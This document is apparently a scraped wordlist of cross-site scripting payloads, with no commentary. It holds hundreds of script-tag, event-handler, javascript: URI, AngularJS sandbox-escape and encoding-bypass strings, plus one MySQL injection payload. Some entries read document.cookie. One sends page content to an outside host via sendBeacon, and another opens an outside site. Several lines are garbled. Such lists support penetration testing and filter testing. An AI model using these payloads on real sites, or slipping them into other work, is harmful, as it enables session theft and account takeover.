%3Cscript%0Caaaaa%3Ealert%28123%29%3C/script%0Caaaaa%3E

%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(/xss/)

%3Cscript%3E%60alert%60%28%2FXSS%2F%29%3B%3C%2Fscript%3E

3Cscript%3Ealert(1)%3C%2Fscript%3E

3Cscript%3Ealert(1)%3C%2Fscript%3E##1

%3cscript%3ealert(1)%3c/script>

%3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E

%3cscript%3ealert(1)%3c/script%3e

%3Cscript%3Ealert(1)%3C/script%3E

%3Cscript%3Ealert(1)%3C/script%3E##1

%3cscript%3ealert%281%29%3b%3c%2fscript%3e

%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2fscript%3E

%3cscript%3ealert()%3c/script>

%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E

#%3Cscript%3Ealert('XSS')%3C%2Fscript%3E

%3Cscript%3Ealert(`xss`)%3C/script%3E

%3Cscript%3Ealert('XSS')%3C/script%3E

%3Cscript%3Efor((TESTXSS)in(self))eval(TESTXSS)(`${`TESTXSS`}`)%3C/script%3E

%3Csvg%20onload%3D%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%28%26%231%3B%29%3E

%3Csvg%20onload%3D%60alert%28%2FXSS%2F%29%60%3E%3C%2Fsvg%3E

%3Csvg%20onload%3D%60alert%28%60XSS%60%29%60%3E

%3Csvg%20onload=alert(1)%3E

%3Csvg%2Fonload%3D'alert%26%2340%2023%20%26%2341'%3E

%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E

%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >

%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F

%3csvg/onload=window%5b%22al%22+%22ert%22%5d1337`%3e

%3csvg/onload=window%5b"al"+"ert"%5d`1337`%3e

%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

%3Cx/Onpointerrawupdate=confirm%26lpar;)%3Exxxxx

%3E%3Cbody%20onload=javascript:alert(1)%3E

'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

"%3E<img src=x onerror=prompt(document.domain);%3E"

%3E'><script>alert(2);</script>

%3F%20<body onload=alert("bingo")>

%3F%20<img src=1 onerror=alert(1)>

%3F%20<img/src/onerror=alert(coffinxp`)>

%3F%20"><img src=q onerror=alert(1)>

%3F%20"><img src=x onerror=prompt(document.domain);>

%3F%20javascript:alert(1)

%3F%20<script>alert(1)</script>

%3F%20<script>prompt(document.domain)</script>

%3F%20"><svg onload=alert(1)>

444-555-4455 <img src=x onerror=alert(1)>

[45].some.alert()

/*!50000and*/ /*!50000extractvalue*/(0x0a,/*!50000concat(0x0a,(select JSON_OBJECT(1, current_user())))*/)

%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074%28%29

%60%2balert/**/(1)%2b%60

&#60;body onload=alert('ibrahimxss')&#62;&#34;&#34;

&#60;script&#62;alert(1)&#60;/script&#62;

&#60;svg/onload=alert(1)&#62;

6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/

&#62;'&gt;"<script>alert(2);</script>

%7b%0a%20%20%22%64%61%74%61%22%3a%20%22%7b%74%65%78%74%3a%3c%69%6d%67%2f%73%72%63%3d%78%20%6f%6e%6c%6f%61%64%3d%63%6f%6e%66%69%72%6d%28%31%29%3e%7d%22%2c%0a%20%20%22%65%76%65%6e%74%49%44%22%3a%20%32%33%34%32%33%0a%7d

a<%00meta name="i" HTTP-EQUIV="refresh" CONTENT="0;url=data:text/h%00tml;base64,PHNjcmlwdD5hbGVydCgiT1BFTkJVR0JPVU5UWSIpOzwvc2NyaXB0Pg==">

"><A%20%252F=""Href=%20JavaScript:k='%22',top[k+'lert']('XSS')">

"><A%20%252F=""Href=%20JavaScript:k=%27a%27,top[k%2B%27lert%27](origin)>

(A(%22onerror=%22alert%601%60%22))

(A(%22onerror='alert%60123%60'test))/

(A(%22onerror='alert%601%60'testabcd))/

<a2 onfocus=alert(1) autofocus tabindex=1>

<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a

<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a>

a=8,b=confirm,c=window,c.onerror=b;throw-a

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a>

aaaaa\”-confirm`1`//

"><a>a</a><img src=x onerror=alert(document.cookie)>{{9-9}}';alert(0);://

"aaa&#x3C;a href=javas&#x26;#99;ript:alert(1)&#x3E;click"

a'-alert(1)//

a=alert,a(1)

";(a=alert,b=1,a(b))

-(a=alert,b="_Y000!_",[b].find(a))-'

abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e

ABC<div style="x:expression\x5C(javascript:alert(1)">DEF

ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF

" accesskey='x' onclick='confirm`1`' //

<a @['c\lic\u{6b}']="_c.constructor('alert(1)')()">test</a>

{{'a'.constructor('alert(1)')()}}

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

{{'a'.constructor.constructor('alert(1)')()}}

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='"+(y='if(!window\u002ex)alert(window\u002ex=1)')+eval(y)+"'");}}}}

<acronym id=x tabindex=1 onfocus=alert(1)></acronym>

<a data-orig-ref="

alert(1)" data-orig-proto="javascript" href="javascript://

alert(1)">clickme</a>

[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

<address id=x tabindex=1 onfocus=alert(1)></address>

=a=document.domain;top["al"%2b"ert"](/%2a%2a/a)>

a=document.domain;top["al"%2b"ert"](/%2a%2a/a)>

+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-

+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-

a=”Fun”;b=”ction”;c=”ev”;d=”al(a”;e=”tob”;f=”(‘YWxlcnQoMSk=’))”;self[a+b](c+d+e+f)();

<a href="&#0000106avascript:alert(1)">XSS</a>

<a href=&#01javascript:alert(1)>

<a href="&#106;avascript:alert(2)">a</a>

<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>

</> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </>

<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>

<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20click%20here</a>

<a/href=&#74;ava%0a%0d%09script&colon;alert()>click

'"><A HRef=" AutoFocus OnFocus=top/**/?.'ale'%2B'rt'>"

'"><A HRef=" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>

<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a

<a HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">ugh</a>

<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

<a href="data:text/html;charset=utf-7;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=">Click Here</a> { Data URI XSS: data:text/html;charset=utf-7;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4= (PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=) : <script>alert('XSS')</script> }

"<a href=""/*"">*/)});function+__MobileAppList(){alert(1)}//>"

<a href="/*">*/)});function+__MobileAppList(){alert(1)}//>

<A HREF="http://0102.0146.0007.00000223/">XSS</A>

<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>

<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>

<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />tap

<a/href="ja%0d%0avascr%0di%0apt:window['axlxexrt’ replace(/x/,")]()">CLICK ME

<a href="ja%0Dva%0Dscr%0Dipt:aler%0Dt(1)">

<a href=ja%26Tab%3bvasc%26Tab%3bript:prompt`1`>pwn</a>

<a/href="jav%09%0dascri%09%0dpt%26%23x0000000000000000000000000000000003a; alert%26%23x28;%26%23x29;'>CLICK

<a/href="jav%09ascr%09ipt:window[la\lert’]()">Click me!</a>

<a href="jav%0Dascript&colon;alert(1)">

<a href="jav&#65ascript:javascript:alert(1)">test1</a>

<a href="jav&#97ascript:javascript:alert(1)">test1</a>

<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>

<a href=javas%26#99;ript:prompt%26#x28document.domain)>xss

<a+href="javas&#99;ript&#35;alert(1);">

<a href=javas&#99;ript:alert(1)>

<a href="javascript&#0000058&#0000097lert('Successful XSS')">Click this link!</a>

<a href="jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e">click me</a>

<a/href="javascript%0A%0D:alert()">

<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">

<a href="javascript:alert(1)">a</a>

<a href=javascript:alert(1)>click

<a href=”javas cript:alert(document.cookie)” >Testing.com </a>

<a/href=javascript&colon;alert()>click

<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>

<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>

<a href=javascript&colon;confirm(1)>

<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">

<a href="javascript:pro\u006dpt(document.cookie)">L1k0r</a>

<a href="javascript:var a='&apos;-alert(1)-&apos;'">a</a>

<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

<a href="javascript:x='%27-alert(1)-%27';">XSS</a>

<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>

<a/href="javas&#x63;ript:al&#x6c;rt()">CLICK ME

"><a href=jav&#x0D;ascript&colon;top[8680439..toString(30)](document.domain)>Click</a>

<a href="jav&#x61script:alert(3)">a</a>

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this['document']['cookie']&rpar;">X</a>

<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">

<a href=[]" onmouseover=prompt(1)//">XYZ</a>

<a href='vbscript:MsgBox("Successful XSS")'>Click here</a>

<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="&#x6a;avascript:alert(1)">XSS</a>

<a href="&#X6A;avascript:alert(1)">XSS</a>

<a href=" &#x8; &#23; javascript:alert('Successful XSS')">Click this link!</a>

<a id=x tabindex=1 onfocus=alert(1)></a>

[a](j a v a s c r i p t:prompt(document.cookie))

[a](javascript:prompt(document.cookie))

[a](javascript:window.onerror=alert;throw%201)

”al”;b=”ert”;self[a+b]();

(alert)()

";alert(0);//

'-alert(0)-'

[alert][0].call(this,1)

"}]}';alert(1);{{'

#'-alert(1)-'

#"-alert(1)}//

#";alert(1);//

#\'-alert(1)//

#alert`1`

');alert(1)//

'-alert(1)-'

'-alert(1)//

'|alert(1)|'

('+'alert(1)+')();

(alert)(1)

+alert(1)+

-alert(1)-'

.alert(1);

/*alert(1)*/

; alert(1);//

"-alert(1)}//

";alert(1);//

\'-alert(1)//

{{{}.")));alert(1)//"}}

{}.")));alert(1)//";

alert(1)

alert?.(1)

alert`1`

""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y

;alert(123);

";alert(123);t="

#';alert(123);t='

';alert(123);t='

-alert(1)-&apos;

"])},alert(1));(function xss() {//

*/alert(1)">'onload="/*<svg/1='

`-alert(1)">'onload="`<svg/1='

'alert(1)'.replace(/.+/,eval)

>alert(1)</script>

*/alert(1)</script><script>/*

'>alert(1)</script><script/1='

["');alert('1’);//"]@xyz.xxx

-alert(23)/

alert`23`

"};alert(23);a={"a":

#alert(document['cookie'])

');alert(document.cookie)();//

';alert(document.cookie)//

'});alert(document.cookie);//'

{alert('document.cookie')}

alert(document['cookie'])

alert?.(document?.cookie)

"alert(document.cookie)['script'](2);"

';alert(document.domain)//

alert(document.domain)

';alert("ibrahimxss");//

alert##<script>prompt(1234)</script>

";alert(String.fromCharCode(88,83,83))

//";alert(String.fromCharCode(88,83,83))

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";

alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--

';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))

alert(String.fromCharCode(88))

alert = window["al"+"ert"]

'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}

\";alert('XSS');//

["');alert('xss');//"]@xyz.xxx

["');alert('XSS');//"]@xyz.xxx

"}]}';alert('You got XSSed')

al\u0065rt(1)

">a

amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=

&#60;script&#62;alert(1)&#60;/script&#62;

"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;amp;amp;gt;

"&amp;amp;amp;gt;&amp;amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;amp;gt;

"&amp;amp;amp;gt;&amp;amp;amp;lt;svg onload=alert(1)&amp;amp;amp;gt;

”&amp;amp;amp;gt;&amp;amp;amp;lt;svg onload=alert&amp;amp;amp;amp;#0000000040"1")&amp;amp;amp;gt;

"&amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;gt;

&amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;gt;

&amp;amp;amp;lt;img/src/onerror=alert(`coffinxp`)&amp;amp;amp;gt;

&amp;amp;amp;lt;script&amp;amp;amp;gt;alert(1)&amp;amp;amp;lt;/script&amp;amp;amp;gt;

"&amp;amp;gt;&amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;gt;

"&amp;amp;gt;&amp;amp;lt;svg onload=alert(1)&amp;amp;gt;

”&amp;amp;gt;&amp;amp;lt;svg onload=alert&amp;amp;amp;#0000000040"1")&amp;amp;gt;

"&amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;gt;

&amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;gt;

&amp;amp;lt;img/src/onerror=alert(`coffinxp`)&amp;amp;gt;

&amp;amp;lt;script&amp;amp;gt;alert(1)&amp;amp;lt;/script&amp;amp;gt;

"&amp;gt;&amp;lt;img src=x onerror=prompt(document.domain);&amp;gt;

"&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;

”&amp;gt;&amp;lt;svg onload=alert&amp;amp;#0000000040"1")&amp;gt;

"&amp;lt;img src=1 onerror=alert(1)&amp;gt;

&amp;lt;img src=1 onerror=alert(1)&amp;gt;

&amp;lt;img/src/onerror=alert(`coffinxp`)&amp;gt;

&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;

"&gt;&lt;img src=x onerror=prompt(document.domain);&gt;

"&gt;&lt;svg onload=alert(1)&gt;

”&gt;&lt;svg onload=alert&amp;#0000000040"1")&gt;

"&lt;img src=1 onerror=alert(1)&gt;

&lt;img src=1 onerror=alert(1)&gt;

&lt;img/src/onerror=alert(`coffinxp`)&gt;

&lt;script&gt;alert(1)&lt;/script&gt;

">

anything&callback=%22;alert%60XSS_POC_BY_SAAJAN_BHUJEL%60;%2f%2f

anything&callback=";alert`XSS_POC_BY_SAAJAN_BHUJEL`;//

anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz

anythinglr00alert(document.domain)uxldz

Click Here!

Click Here!

elcezeri!

(A("onerror='alert`1`'testabcd))/

 

xss

xxs link

xxs link

\xxs link\

\xxs link\

test

& apos;>alert(2);

  

";a=prompt,a()//

';a=prompt,a()//

";a=prompt,a(1)//

asdf"onload%3d"alert('Slax Was Here!')"asdf

asd"`> onpointerenter=x=prompt,x`XSS`

//?aspxerrorpath=alert(1)

XXX

">Click

?>Click

{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\u002ex)alert(window\u002ex=1)')+eval(y)+"'");}}

a=`\u003c`,b=`\u003e`,location=`javascript:[].findIndex(dump)+(/${a}img src=# onerror=alert(1)${b}/.source)`

   

">

 

/* */

  

“autofocus onclick=’alert()’

“autofocus onclick=’alert()

" autofocus onfocus=alert(1)

"autofocus/onfocus=alert(1)//

"autofocus onfocus='alert(document.domain)'

autofocus ' onfocus='alert(document.domain)'

“autofocus onFocUs=’find(l\u{6F}cati\u{6F}n=`j&Tab;avascr&NewLine;ipt&colon;al&Tab;ert()`)’

" autofocus onkeyup="javascript:alert(123)

ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6

ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -@naglinagli

a

test

banner.swf?clickTAG=javascript:alert(1);//

  

%BCscript%BEalert(%A21%A2)%BC/script%BE

  

blah(""+new class b{toString=e=>location=name}+"")

#blalala');alert(1);('a

blalala');alert(1);('a

click

dragme

Right click me<!--

<body background="javascript:alert('Successful XSS')">

<BODY BACKGROUND="javascript:alert('XSS')">

<body language=vbs onload=confirm-1

<body onactivate=alert(1)>

<body onbeforeprint=console.log(1)>

"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">

><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">

<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>

<body onbeforeunload=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>

<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>

<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>

<body onfocusin=alert(1)>

<body onhashchange="print()">

<body oninput=javascript:alert(1)><input autofocus>

<body oninput=javascript:alert(/AmoloHT/)><input autofocus>

<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>

<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>

"<BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert(“XSS”)>"

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>

<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>

#<body onload=alert(“bingo”)>

<body onload=alert(“bingo”)>

#<body onload="alert('XSS')">

<BODY ONLOAD=alert('XSS')>

<body onload=alert(/XSS/.source)>

<body onload body onload="javascript:javascript:alert(1)"></body onload>

<body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">

<BODY ONLOAD=javascript:alert(1)>

<BODY ONLOAD=javascript:javascript:alert(1)>

<body/onload=&lt;!--&gt;&#10alert(1)>

"<body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>"

""><body/onload=&lt;!--&gt;&#10confirm(1);prompt(/XSS/.source)>",

<body onload="window.alert('XSS_WAF_BYPASS')">

"><body/onload="{x:onerror=alert};x"

"><body/onload="{x:onerror=alert};x"

<body onmessage=print()>

<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>

<body onorientationchange=alert(1)>

<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>

<body onpageshow=alert(1)>

"><body/oNpagEshoW=(confirm)(document.domain)>

"/><body onpageshow-prompt`assassin`//

<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>

<body onpopstate=print()>

<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>

<body onresize="print()">

{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}

<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>

<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

<body ontouchend=alert(1)>

<body ontouchmove=alert(1)>

<body ontouchstart=alert(1)>

<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>

breakout"/href="javas%26%23x63 ;ript:selffalx\ert%'.replace(/x/,"]()"

<BR SIZE="&{alert('XSS')}">

<BR SIZE="&{javascript:alert(1)}">

</br style=a:expression(alert(1))>

<brute+onbeforescriptexecute=a=alert,a(1%26%23x29>

<b <script>alert(1)</script>0

'+ '</b><script>alert(document.cookie)</script><b><!--'

</b><script>alert(document.cookie)</script><b><!--

<button autofocus onfocus=alert(1)>test</button>

<button autofocus onfocus=confirm(2)>

<button formaction="javascript:alert('XSS')">Click me</button>

<button onClick="alert('xss')">Submit</button>

%c0″//(0000%0dconfirm(1)//

%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE

{{c=%27%27.sub.call;b=%27%27.sub.bind;a=%27%27.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync(%22astNode=pop();astNode.type=%27UnaryExpression%27;astNode.operator=%27(window.X?void0:(window.X=true,alert(document.domain)))+%27;astNode.argument={type:%27Identifier%27,name:%27foo%27};%22);m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a=%27%27.sub;$eval(%27a(b.c)%27);[].push.apply=a;}}

{{c='%27%27.sub.call;b='%27%27.sub.bind;a='%27%27.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync('alert(document.domain)');m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a='%27%27.sub;$eval('a(b.c)'):[].push.apply=a:}}

{{c='%27%27.sub.call;b='%27%27.sub.bind;a='%27%27.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync("astNode=pop();astNode.type='UnaryExpression';astNode.operator='(window.X?voide:(window.X=true,alert(document.domain)))+';astNode.argument={type:'Identifier',name:'foo'};");m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a='%27%27.sub;$eval('a(b.c)'):[].push.apply=a:}}

{{c='%27%27.sub.call;b='%27%27.sub.bind;a='%27%27.sub.apply;c.$apply=$apply;c.$eval=b;op=$root.$$phase;$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;C=c.$apply(c);$root.$$phase=op;$root.$digest=od;B=C(b,c,b);$evalAsync('prompt("Enter something:", document.domain)');m1=B($$asyncQueue.pop().expression,null,$root);m2=B(C,null,m1);[].push.apply=m2;a='%27%27.sub;$eval('a(b.c)'):[].push.apply=a:}}

"));}catch(e){confirm(document.domain);}//

"));}catch(e){confirm(document.domain)}//

;"))}catch(e) {confirm(document.location);}//

;\"))}catch(e) {confirm(document.location);}//

"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//

"));}catch(e){x=window.open('http://xss.cx/');setTimeout('confirm(x.document.body.innerText)',4000)}//

{{_c.constructor('alert(1)')()}}

'`"><*chr*script>log(*num*)</script>

coffinxp"*alert(1)*"

<command onclick="alert('XSS')">Command</command>

//comment%0a%0dalert(0);

<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">

<comment><img src="</comment><img src=x onerror=javascript:alert(/AmoloHT/))//">

<component is=script text=alert(1)>

"-confirm(1)-"

#'-confirm(1)-

#*/confirm(1)

');confirm(1);//

'-confirm(1)-

\');confirm(1);//

\”-confirm`1`//

\”}})})-confirm`1`;({{/*///

confirm?.(1)

\”}})})-confirm`1`(a=>{({b:{/*///

\”}})})-confirm`1`;(function(){({if(){/*///

confirm(1)".replace(/.+/,eval)//

confirm(1)>>>/xss

'+confirm(9)&&null=='

'-confirm(document.cookie)-'

#'confirm(document.domain)'>

'-confirm(document.domain)-'

'confirm(document.domain)'>

-(confirm)(document.domain)//

";confirm(document.location);//

confirm(document.location)

confirm(document.selection.createRange().getBookmark())

confirm(location.hostname)

';confirm(String.fromCharCode(88,83,83))//';confirm(String.fromCharCode(88,83,83))//";

confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//--

confirm(window.toStaticHTML('<base href="http://xss.cx/"></base>'));

confirm(window.toStaticHTML('<label style="overflow:hidden;background:red;display:block;width:4000px;height:4000px;position:absolute;top:0px;left:0px;" for="submit">Click'));

confirm(window.toStaticHTML('<marquee>foo</marquee>'));

confirm(<xss>xs{[function::status]}s</xss>)

<c/onpointerrawupdate=d=document,b=%27%60%27,d[%27loca%27%2B%27tion%27]=%27javascript%26colon;aler%27%2B%27t%27%2Bb%2Bdomain%2Bb>

console.log(document.domain)

{{constructor.constructor(‘a=document;confirm(a.domain)’)()}}

{{constructor.constructor("alert(0)")()}}

#{{constructor.constructor(alert`1`)()}}

#constructor.constructor('alert(1)')()

{{''.constructor.constructor('alert(1)')()}}

{{constructor.constructor('alert(1)')()}}

{{constructor.constructor(‘alert(1)’)()}}

{{constructor.constructor(alert`1`)()}}

constructor.constructor('alert(1)')()

[[constructor.constructor('alert(document.cookie)')()]]

{{{{constructor.constructor('alert("XSS")')()}}

{{constructor.constructor('alert(/XSS Stored!/)')()}}

{{constructor.constructor('eval(atob(\'amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5jb29raWUp\'))')()}}

{{constructor.constructor('eval(atob("YWxlcnQoMSk="))')()}}

{{constructor.constructor('prompt(1)')()}}

{{constructor.constructor(valueOf.name.constructor.fromCharCode(97,108,101,114,116,40,49,41,10))()}}

/cpanelwebcall/<img src=x onerror="prompt(1)">aaaaaaaaaaaa

